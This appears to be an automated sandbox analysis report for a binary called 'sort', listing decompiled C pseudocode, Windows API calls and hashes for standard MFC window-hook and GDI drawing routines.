                                            					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
                                            						goto L27;
                                            					}
                                            					_t76 =  *(_t95 + 0x28);
                                            					_t92 = _t76 >> 0x10;
                                            					if(_t92 == 0) {
                                            						_v20 = _v20 & _t92;
                                            						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
                                            						_t76 =  &_v20;
                                            					}
                                            					if(lstrcmpiA(_t76, ?str?) == 0) {
                                            						goto L27;
                                            					} else {
                                            						goto L10;
                                            					}
                                            				} else {
                                            					L27:
                                            					_t102 = _v8;
                                            					L28:
                                            					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
                                            					if(_v12 != 0) {
                                            						UnhookWindowsHookEx( *(_t102 + 0x2c));
                                            						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
                                            					}
                                            					return _t96;
                                            				}
                                            			}

                                            APIs
                                              • Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1
                                            • CallNextHookEx.USER32 ref: 00413A26
                                            • GetClassLongA.USER32 ref: 00413A6D
                                            • GlobalGetAtomNameA.KERNEL32 ref: 00413A99
                                            • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0002440D), ref: 00413AA8
                                            • GetWindowLongA.USER32 ref: 00413B1B
                                            • SetWindowLongA.USER32 ref: 00413B3C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                            • String ID: AfxOldWndProc423$ime
                                            • API String ID: 3731301195-104836986
                                            • Opcode ID: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
                                            • Instruction ID: e36065fefe0489718c47fffdee2bb39183bb531f2b2dfd07b326dd1187a37919
                                            • Opcode Fuzzy Hash: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
                                            • Instruction Fuzzy Hash: C951C531604215ABCF21AF25DC48B9F7BA8FF04762F104525F916A7292D738EE81CB9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00423C5A(intOrPtr* __ecx, void* __eflags) {
                                            				void* _t146;
                                            				void* _t150;
                                            				void* _t159;
                                            				void* _t165;
                                            				intOrPtr* _t246;
                                            				RECT* _t250;
                                            				void* _t255;
                                            
                                            				E00406520(E0042AAB8, _t255);
                                            				_t246 = __ecx;
                                            				E00405556(_t255 - 0x2c);
                                            				 *(_t255 - 0x2c) = 0x42f0f0;
                                            				 *((intOrPtr*)(_t255 - 4)) = 0;
                                            				E00405556(_t255 - 0x1c);
                                            				 *(_t255 - 0x1c) = 0x42f0f0;
                                            				 *((char*)(_t255 - 4)) = 1;
                                            				E00405556(_t255 - 0x14);
                                            				 *(_t255 - 0x14) = 0x42f0f0;
                                            				 *((char*)(_t255 - 4)) = 2;
                                            				E0041A611(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
                                            				CopyRect(_t255 - 0x44,  *(_t255 + 8));
                                            				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
                                            				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
                                            				E0041A611(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
                                            				E0041A611(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
                                            				asm("sbb eax, eax");
                                            				asm("sbb ecx, ecx");
                                            				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
                                            				_t261 =  *((intOrPtr*)(_t255 + 0x20));
                                            				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
                                            					 *((intOrPtr*)(_t255 + 0x20)) = E00423BE7(_t261);
                                            				}
                                            				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
                                            					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
                                            				}
                                            				E00405556(_t255 - 0x24);
                                            				 *(_t255 - 0x24) = 0x42f0f0;
                                            				 *((char*)(_t255 - 4)) = 3;
                                            				E00405556(_t255 - 0x34);
                                            				 *((intOrPtr*)(_t255 - 0x34)) = 0x42f0f0;
                                            				_t250 =  *(_t255 + 0x14);
                                            				 *((char*)(_t255 - 4)) = 4;
                                            				if(_t250 != 0) {
                                            					E0041A611(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
                                            					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
                                            					CopyRect(_t255 - 0x44, _t250);
                                            					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
                                            					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
                                            					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
                                            					asm("sbb eax, eax");
                                            					asm("sbb ecx, ecx");
                                            					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
                                            					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
                                            						E0041A611(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
                                            						asm("sbb eax, eax");
                                            						asm("sbb ecx, ecx");
                                            						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
                                            					E0041A0FB(_t246, _t255 - 0x24);
                                            					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
                                            					_t165 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x24)));
                                            					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
                                            					E00419D35(_t246, _t165);
                                            				}
                                            				_t146 = _t255 - 0x34;
                                            				if( *(_t255 - 0x30) == 0) {
                                            					_t146 = _t255 - 0x2c;
                                            				}
                                            				E0041A0FB(_t246, _t146);
                                            				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
                                            				_t150 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x20)));
                                            				_t251 = _t150;
                                            				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
                                            				if(_t150 != 0) {
                                            					E00419D35(_t246, _t251);
                                            				}
                                            				E0041A0FB(_t246, 0);
                                            				 *((intOrPtr*)(_t255 - 0x34)) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 5;
                                            				E0041A668(_t255 - 0x34);
                                            				 *(_t255 - 0x24) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 6;
                                            				E0041A668(_t255 - 0x24);
                                            				 *(_t255 - 0x14) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 7;
                                            				E0041A668(_t255 - 0x14);
                                            				 *(_t255 - 0x1c) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 8;
                                            				E0041A668(_t255 - 0x1c);
                                            				 *(_t255 - 0x2c) = 0x42cb14;
                                            				 *((intOrPtr*)(_t255 - 4)) = 9;
                                            				_t159 = E0041A668(_t255 - 0x2c);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
                                            				return _t159;
                                            			}
                                            0x00423f1d
                                            0x00423f23
                                            0x00423f27
                                            0x00423f2c
                                            0x00423f32
                                            0x00423f36
                                            0x00423f3b
                                            0x00423f41
                                            0x00423f48
                                            0x00423f53
                                            0x00423f5b

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00423C5F
                                            • CreateRectRgnIndirect.GDI32(?), ref: 00423CA2
                                            • CopyRect.USER32 ref: 00423CB8
                                            • InflateRect.USER32(?,?,?), ref: 00423CCE
                                            • IntersectRect.USER32 ref: 00423CDF
                                            • CreateRectRgnIndirect.GDI32(?), ref: 00423CE9
                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423CFC
                                            • CombineRgn.GDI32(?,?,?,00000003), ref: 00423D26
                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423D71
                                            • SetRectRgn.GDI32(?,?,?,?,?), ref: 00423D8E
                                            • CopyRect.USER32 ref: 00423D99
                                            • InflateRect.USER32(?,?,?), ref: 00423DAF
                                            • IntersectRect.USER32 ref: 00423DBE
                                            • SetRectRgn.GDI32(?,?,?,?,?), ref: 00423DD3
                                            • CombineRgn.GDI32(?,?,?,00000003), ref: 00423DF4
                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423E0C
                                            • CombineRgn.GDI32(?,?,?,00000003), ref: 00423E36
                                              • Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
                                              • Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
                                              • Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F
                                              • Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,00000000), ref: 0041A11D
                                              • Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,?), ref: 0041A133
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D
                                            • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423E8C
                                            • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423EE0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
                                            • String ID:
                                            • API String ID: 4023391435-0
                                            • Opcode ID: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
                                            • Instruction ID: ab3a66f40d2d04ee3edfb297914df431d927688ea4f6a4c6808893f8cc49b6d9
                                            • Opcode Fuzzy Hash: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
                                            • Instruction Fuzzy Hash: A4A146B2A00119EFCF05EFA4DD95DEEBBB9EF08304F14411AF506A2250DB38AE55CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00428C35(intOrPtr* __ecx) {
                                            				void* _t19;
                                            				void* _t46;
                                            				void* _t64;
                                            
                                            				if( *(__ecx + 4) != 0) {
                                            					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
                                            					SelectObject( *(__ecx + 8), _t64);
                                            					SelectObject( *(__ecx + 4), _t64);
                                            					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
                                            					SelectObject( *(__ecx + 8), _t46);
                                            					SelectObject( *(__ecx + 4), _t46);
                                            					E00419E06(__ecx, GetROP2( *(__ecx + 8)));
                                            					E00419DAA(__ecx, GetBkMode( *(__ecx + 8)));
                                            					E0041A240(__ecx, GetTextAlign( *(__ecx + 8)));
                                            					E00419DD8(__ecx, GetPolyFillMode( *(__ecx + 8)));
                                            					E00419E34(__ecx, GetStretchBltMode( *(__ecx + 8)));
                                            					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
                                            					 *((intOrPtr*)( *__ecx + 0x30))();
                                            					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
                                            					return  *((intOrPtr*)( *__ecx + 0x2c))();
                                            				}
                                            				return _t19;
                                            			}

                                            APIs
                                            • GetStockObject.GDI32(00000007), ref: 00428C4D
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C59
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C61
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C67
                                            • GetStockObject.GDI32(00000004), ref: 00428C6B
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C71
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C79
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C7F
                                            • GetROP2.GDI32(00000000), ref: 00428C84
                                              • Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E1F
                                              • Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E2D
                                            • GetBkMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428C95
                                              • Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DC3
                                              • Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DD1
                                            • GetTextAlign.GDI32(00000000), ref: 00428CA6
                                              • Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A25B
                                              • Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A269
                                            • GetPolyFillMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CB7
                                              • Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DF1
                                              • Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DFF
                                            • GetStretchBltMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CC8
                                              • Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E4D
                                              • Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E5B
                                            • GetTextColor.GDI32(00000000), ref: 00428CD9
                                            • GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428CE9
                                            • GetBkColor.GDI32(00000000), ref: 00428CF6
                                            • GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428D00
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
                                            • String ID:
                                            • API String ID: 1751264856-0
                                            • Opcode ID: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
                                            • Instruction ID: b09d1b0ebf0f207bae19d4c81b9403c04553573e303ad89ba419e4ec13758243
                                            • Opcode Fuzzy Hash: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
                                            • Instruction Fuzzy Hash: 76214171200915AFC7227B66DC19D2FBBAEFF887407014429F55A82570CB35ACA29F98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00427432(intOrPtr* __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* _t171;
                                            				struct HDC__* _t188;
                                            				intOrPtr* _t192;
                                            				intOrPtr _t203;
                                            				struct HBRUSH__* _t239;
                                            				intOrPtr* _t244;
                                            				signed int* _t276;
                                            				intOrPtr* _t281;
                                            				intOrPtr _t301;
                                            				intOrPtr _t317;
                                            				intOrPtr* _t339;
                                            				intOrPtr _t342;
                                            				intOrPtr _t343;
                                            				int* _t351;
                                            				intOrPtr* _t352;
                                            				int _t353;
                                            				void* _t355;
                                            
                                            				_t171 = E00406520(E0042A17C, _t355);
                                            				_t281 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                            					L22:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
                                            					return _t171;
                                            				} else {
                                            					_t339 =  *((intOrPtr*)(_t355 + 8));
                                            					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
                                            					 *((intOrPtr*)(_t355 - 0x38)) = 0;
                                            					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
                                            					 *(_t355 - 0x28) =  *(_t355 - 0x20);
                                            					 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb24;
                                            					 *(_t355 - 4) = 0;
                                            					E0041A611(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
                                            					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
                                            					 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb24;
                                            					 *(_t355 - 4) = 1;
                                            					E0041A611(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
                                            					 *((intOrPtr*)(_t355 - 0x10)) = 0;
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
                                            					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
                                            						L21:
                                            						E0041A668(_t355 - 0x3c);
                                            						E0041A668(_t355 - 0x34);
                                            						 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb14;
                                            						 *(_t355 - 4) = 2;
                                            						E0041A668(_t355 - 0x34);
                                            						 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb14;
                                            						 *(_t355 - 4) = 3;
                                            						_t171 = E0041A668(_t355 - 0x3c);
                                            						goto L22;
                                            					} else {
                                            						 *((intOrPtr*)(_t355 - 0x14)) = 0;
                                            						while(1) {
                                            							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
                                            							if(_t339 != 0) {
                                            								_t188 =  *(_t339 + 4);
                                            							} else {
                                            								_t188 = 0;
                                            							}
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
                                            							_t192 =  *((intOrPtr*)(_t281 + 0x114));
                                            							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
                                            								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
                                            							}
                                            							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
                                            							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
                                            							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
                                            							 *((intOrPtr*)( *_t339 + 0x1c))();
                                            							_t203 =  *((intOrPtr*)(_t281 + 0x90));
                                            							_t301 =  *((intOrPtr*)(_t355 - 0x14));
                                            							_t351 = _t301 + _t203;
                                            							 *(_t355 - 0x1c) = _t351;
                                            							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
                                            								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
                                            								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
                                            									_t276 = E0041AFCE(_t281, _t355 - 0x44);
                                            									 *(_t355 - 0x2c) =  ~( *_t276);
                                            									 *(_t355 - 0x28) =  ~(_t276[1]);
                                            								}
                                            							}
                                            							 *((intOrPtr*)( *_t339 + 0x34))(1);
                                            							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
                                            							E00419FFB(_t339, _t355 - 0x54, 0, 0);
                                            							 *((intOrPtr*)( *_t339 + 0x24))(5);
                                            							E00419D35(_t339, _t355 - 0x3c);
                                            							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
                                            							E00419D35(_t339, _t355 - 0x34);
                                            							E0041A1BF(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
                                            							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
                                            							E0041A1BF(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
                                            							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
                                            							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
                                            							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
                                            							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
                                            							_t239 = GetStockObject(0);
                                            							_t352 =  *((intOrPtr*)(_t355 + 8));
                                            							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
                                            							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
                                            							_t244 =  *((intOrPtr*)(_t281 + 0x114));
                                            							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
                                            								break;
                                            							}
                                            							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
                                            							_t342 =  *((intOrPtr*)(_t355 - 0x10));
                                            							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
                                            								L18:
                                            								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
                                            								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
                                            								if(_t342 == 0) {
                                            									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
                                            									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
                                            										E00427C71(_t281, _t249 - 1, 1);
                                            									}
                                            								}
                                            								goto L21;
                                            							}
                                            							_t343 = _t342 + 1;
                                            							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
                                            							_t353 =  *(_t355 - 0x1c);
                                            							E00428B78(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
                                            							E004298F1( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
                                            							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
                                            							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
                                            							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
                                            							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
                                            							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
                                            							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
                                            							E00429859( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
                                            							E0042986F( *((intOrPtr*)(_t281 + 0x74)));
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
                                            							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
                                            							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
                                            							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
                                            								_t339 =  *((intOrPtr*)(_t355 + 8));
                                            								continue;
                                            							}
                                            							goto L21;
                                            						}
                                            						_t342 =  *((intOrPtr*)(_t355 - 0x10));
                                            						goto L18;
                                            					}
                                            				}
                                            			}
                                            0x004276d6
                                            0x004276dc
                                            0x004276eb
                                            0x004277a0
                                            0x004277a5
                                            0x004277b1
                                            0x004277b6
                                            0x004277b8
                                            0x004277c1
                                            0x004277c9
                                            0x004277c9
                                            0x004277c1
                                            0x00000000
                                            0x004277b6
                                            0x004276f3
                                            0x004276f8
                                            0x004276fe
                                            0x0042770a
                                            0x0042771e
                                            0x00427728
                                            0x00427732
                                            0x00427735
                                            0x0042773b
                                            0x0042773e
                                            0x00427744
                                            0x00427747
                                            0x00427753
                                            0x0042775b
                                            0x0042776e
                                            0x00427779
                                            0x00427785
                                            0x00427788
                                            0x00427792
                                            0x00427795
                                            0x004274e8
                                            0x00000000
                                            0x004274e8
                                            0x00000000
                                            0x0042779b
                                            0x0042779d
                                            0x00000000
                                            0x0042779d
                                            0x004274dd

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00427437
                                            • GetViewportOrgEx.GDI32(?,?), ref: 00427462
                                            • GetSysColor.USER32(00000006), ref: 00427489
                                            • CreatePen.GDI32(00000000,00000002,00000000), ref: 00427490
                                            • GetSysColor.USER32(00000010), ref: 004274B0
                                            • CreatePen.GDI32(00000000,00000003,00000000), ref: 004274B8
                                            • GetDeviceCaps.GDI32(?,0000000A), ref: 00427556
                                            • GetDeviceCaps.GDI32(?,00000008), ref: 00427563
                                            • SetRect.USER32 ref: 00427577
                                            • DPtoLP.GDI32(?,?,00000002), ref: 0042758F
                                            • Rectangle.GDI32(00000001,769963E0,?,?,?), ref: 0042762D
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D
                                              • Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1E1
                                              • Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1F5
                                              • Part of subcall function 0041A20B: MoveToEx.GDI32(?,?,?,00000000), ref: 0041A225
                                              • Part of subcall function 0041A20B: LineTo.GDI32(?,?,?), ref: 0041A236
                                            • GetStockObject.GDI32(00000000), ref: 004276A4
                                            • FillRect.USER32 ref: 004276B5
                                              • Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
                                              • Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F
                                              • Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
                                              • Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
                                              • Part of subcall function 0042986F: SetMapMode.GDI32(?,00000001), ref: 004298A5
                                              • Part of subcall function 0042986F: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
                                              • Part of subcall function 0042986F: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
                                              • Part of subcall function 0042986F: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
